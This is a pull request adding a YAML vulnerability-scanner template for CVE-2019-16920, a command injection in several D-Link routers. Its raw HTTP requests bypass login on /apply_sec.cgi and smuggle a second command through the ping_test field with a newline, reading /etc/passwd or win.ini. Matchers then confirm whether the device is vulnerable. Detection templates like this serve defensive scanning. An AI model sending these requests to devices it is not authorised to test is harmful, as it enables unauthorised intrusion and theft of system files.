### PR TITLE
Add CVE-2019-16920

### DIFF
--- a/cves/CVE-2019-16920.yaml
+++ b/cves/CVE-2019-16920.yaml
@@ -1,0 +1,65 @@
+id: cve-2019-16920
+
+info:
+  name: Unauthenticated Multiple D-Link Routers RCE
+  author: dwisiswant0
+  severity: critical
+  description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
+
+  # References:
+  # - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
+
+requests:
+  - raw:
+      - |
+        POST /apply_sec.cgi HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Connection: close
+        Referer: http://{{Hostname}}/
+        Upgrade-Insecure-Requests: 1
+
+        html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
+      - |
+        POST /apply_sec.cgi HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Connection: close
+        Referer: http://{{Hostname}}/login_pic.asp
+        Cookie: uid=1234123
+        Upgrade-Insecure-Requests: 1
+
+        html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
+      - |
+        POST /apply_sec.cgi HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Connection: close
+        Referer: http://{{Hostname}}/login_pic.asp
+        Cookie: uid=1234123
+        Upgrade-Insecure-Requests: 1
+
+        html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+        part: body
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
**Unauthenticated Multiple D-Link Routers RCE**
> Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.